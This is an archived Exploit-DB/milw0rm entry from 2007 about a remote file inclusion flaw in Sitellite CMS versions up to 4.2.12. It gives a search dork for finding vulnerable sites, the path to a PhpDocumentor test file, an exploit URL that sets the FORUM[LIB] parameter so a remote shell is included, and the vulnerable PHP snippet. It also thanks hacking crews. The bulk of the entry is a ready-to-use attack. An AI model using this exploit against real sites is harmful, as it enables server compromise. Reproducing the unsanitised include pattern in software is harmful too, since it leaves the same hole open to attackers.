Sitellite CMS <= 4.2.12 559668.php Remote File Inclusion Vulnerability

2007-06-14T00:00:00
ID EDB-ID:4071
Type exploitdb
Reporter o0xxdark0o
Modified 2007-06-14T00:00:00

Description

Sitellite CMS <= 4.2.12 (559668.php) Remote File Inclusion Vulnerability. CVE-2007-3228. Webapps exploit for php platform

                                        
                                            *sitellite*&lt;http://www.sitelliteforge.com/index/siteforge-download-action/proj.sitellite?dl=sitellite-4.2.12-stable.tar.gz&gt;
v 4.2.12
DORK : "powered by Sitellite"
FOUND BY : o0xxdark0o
           o0xxdark0o[at]msn.com
Website: http://www.sitellite.org/
DOWNLOAD : http://www.sitelliteforge.com/index/siteforge-app/proj.sitellite
REMOTE FILE ICLUDE
############################################################
FILE :
PATH\saf\lib\PEAR\PhpDocumentor\Documentation\tests\bug-559668.php
############################################################
EXP:
xxx.com\path\saf\lib\PEAR\PhpDocumentor\Documentation\tests\559668.php?FORUM[LIB]=Shell
?
############################################################
CODE: on line 4
&lt;?php
/** @package tests */
/** include tests */
require_once $FORUM['LIB'] . '/classes/db/PearDb.php';
require PEAR . 'test' . 'me';
include('file.ext');
include 'file.ext';
include(PEAR . 'test' . 'me');
?&gt;
############################################################
thanks for all my friends.. str0ke ... mr_6.1.9 .... oxdo .... cold z3ro
www.hach-teach.org - www.3asfh.com
############################################################
BY : o0xxdark0o
     o0xxdark0o@msn.com

PhpDocumentor directory is .htaccess'ed

# milw0rm.com [2007-06-14]